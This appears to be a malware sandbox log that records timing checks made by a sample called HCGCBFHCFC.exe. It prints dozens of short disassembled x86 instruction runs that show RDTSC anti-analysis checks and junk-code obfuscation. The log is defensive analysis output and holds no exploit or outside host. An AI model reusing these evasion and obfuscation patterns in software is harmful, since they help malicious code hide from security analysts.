Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E6B2B second address: 9E6BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F73D4D0E054h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F73D4D0E048h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 movzx ebx, bx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F73D4D0E048h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 pushad 0x00000046 cmc 0x00000047 push esi 0x00000048 pop esi 0x00000049 popad 0x0000004a push 00000000h 0x0000004c mov ebx, dword ptr [ebp+122D2F6Ch] 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push edi 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E6BA3 second address: 9E6BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E6BA8 second address: 9E6BB2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F73D4D0E04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E7BD2 second address: 9E7BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E7BE5 second address: 9E7C4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D2E3Ah], esi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F73D4D0E048h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jg 00007F73D4D0E048h 0x00000032 push 00000000h 0x00000034 mov bx, ax 0x00000037 mov dword ptr [ebp+122D1987h], eax 0x0000003d xchg eax, esi 0x0000003e jo 00007F73D4D0E05Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E7C4E second address: 9E7C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E7C66 second address: 9E7C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E8C05 second address: 9E8C7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F73D4C57613h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F73D4C57608h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov bl, E8h 0x0000002a push 00000000h 0x0000002c or dword ptr [ebp+122D236Ch], edi 0x00000032 push 00000000h 0x00000034 sbb di, 0321h 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b jl 00007F73D4C5760Ch 0x00000041 jmp 00007F73D4C57617h 0x00000046 popad 0x00000047 push eax 0x00000048 jnl 00007F73D4C57610h 0x0000004e push eax 0x0000004f push edx 0x00000050 push ebx 0x00000051 pop ebx 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E9D62 second address: 9E9D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9ECBB7 second address: 9ECBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9ECBBB second address: 9ECC46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F73D4D0E048h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 pushad 0x00000028 mov eax, dword ptr [ebp+122D2AC0h] 0x0000002e mov bx, 08D6h 0x00000032 popad 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F73D4D0E048h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f pushad 0x00000050 jmp 00007F73D4D0E04Fh 0x00000055 mov dword ptr [ebp+122D32CBh], ecx 0x0000005b popad 0x0000005c push 00000000h 0x0000005e xchg eax, esi 0x0000005f push edi 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9ECC46 second address: 9ECC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E0B9D second address: 9E0BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E0BA3 second address: 9E0BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E1B6F second address: 9E1B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E2AB4 second address: 9E2ABE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F73D4C5760Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E0BA7 second address: 9E0C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+1247219Ah], ebx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 or bl, 0000004Bh 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F73D4D0E048h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov ebx, dword ptr [ebp+122D226Fh] 0x00000042 mov eax, dword ptr [ebp+122D0AADh] 0x00000048 push FFFFFFFFh 0x0000004a ja 00007F73D4D0E04Eh 0x00000050 push eax 0x00000051 pushad 0x00000052 jmp 00007F73D4D0E054h 0x00000057 pushad 0x00000058 js 00007F73D4D0E046h 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E3AF8 second address: 9E3AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E3AFD second address: 9E3B10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F73D4D0E046h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E4ADD second address: 9E4AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E5C6D second address: 9E5C7A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E6DCB second address: 9E6DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C5760Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E7E0F second address: 9E7E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F73D4D0E04Eh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E8DF9 second address: 9E8E62 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bh, 44h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 sub edi, dword ptr [ebp+122D1A2Eh] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F73D4C57608h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov eax, dword ptr [ebp+122D06F5h] 0x00000040 jmp 00007F73D4C5760Dh 0x00000045 push FFFFFFFFh 0x00000047 mov dword ptr [ebp+122D1950h], edx 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F73D4C5760Ah 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E4AE3 second address: 9E4AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E7E29 second address: 9E7E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9EBE4F second address: 9EBE6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E057h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E4AE8 second address: 9E4AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9EDB34 second address: 9EDB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F73D4D0E04Ch 0x00000011 jnp 00007F73D4D0E046h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E7E2D second address: 9E7E37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9EBE6A second address: 9EBE81 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F73D4D0E04Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E4B9B second address: 9E4B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E4B9F second address: 9E4BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9EFADD second address: 9EFAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9ECD5E second address: 9ECD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9ECD64 second address: 9ECD92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F73D4C5761Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push esi 0x0000000e jp 00007F73D4C5760Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9ECD92 second address: 9ECDDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 stc 0x00000007 push dword ptr fs:[00000000h] 0x0000000e mov ebx, 27130A33h 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a xor dword ptr [ebp+122D1A13h], edx 0x00000020 mov eax, dword ptr [ebp+122D0C65h] 0x00000026 mov bx, dx 0x00000029 push FFFFFFFFh 0x0000002b jmp 00007F73D4D0E04Dh 0x00000030 push eax 0x00000031 js 00007F73D4D0E05Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F73D4D0E04Ah 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9ECDDD second address: 9ECDE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9F3D6C second address: 9F3D76 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F73D4D0E04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9EDC86 second address: 9EDC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9F80B5 second address: 9F80B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9F80B9 second address: 9F80DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F73D4C5760Bh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9F80DB second address: 9F80F3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F73D4D0E04Eh 0x00000008 jnp 00007F73D4D0E04Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9F80F3 second address: 9F811E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jl 00007F73D4C57606h 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007F73D4C57615h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9F7ACA second address: 9F7AEB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F73D4D0E046h 0x00000008 jmp 00007F73D4D0E04Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F73D4D0E046h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9F7AEB second address: 9F7AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9FD53A second address: 9FD55E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F73D4D0E04Fh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9FD55E second address: 9FD568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F73D4C57606h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9FD568 second address: 9FD56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9FD56C second address: 9FD592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4C57618h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9FD592 second address: 9FD59C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F73D4D0E046h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9FD6DF second address: 9FD6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9FD6E3 second address: 9FD6F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9FD6F2 second address: 9FD6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9FD6F8 second address: 9FD723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F73D4D0E055h 0x00000010 jc 00007F73D4D0E046h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9FD723 second address: 9FD75D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c jng 00007F73D4C5760Ch 0x00000012 jnl 00007F73D4C57606h 0x00000018 pop edi 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007F73D4C5760Eh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 push ecx 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jns 00007F73D4C57606h 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A0305E second address: A03062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A03062 second address: A03071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F73D4C57606h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A031AF second address: A031B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A034CD second address: A034EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F73D4C57606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F73D4C5760Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A0390D second address: A03913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A03913 second address: A03919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A03919 second address: A0391D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A09E36 second address: A09E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F73D4C57606h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A09E40 second address: A09E4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F73D4D0E046h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A08C1F second address: A08C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F73D4C57606h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DC84E second address: 9DC89E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D19BDh], edx 0x00000014 lea eax, dword ptr [ebp+124815D2h] 0x0000001a call 00007F73D4D0E057h 0x0000001f sub dword ptr [ebp+12464381h], ecx 0x00000025 pop edi 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007F73D4D0E04Dh 0x0000002f js 00007F73D4D0E046h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DCDD9 second address: 9DCDDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DCDDD second address: 9DCDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DCFE9 second address: 9DCFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DD18E second address: 9DD192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DD78A second address: 9DD78E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DD78E second address: 9DD7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F73D4D0E046h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DDA2C second address: 9DDA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DDAFF second address: 9DDB05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
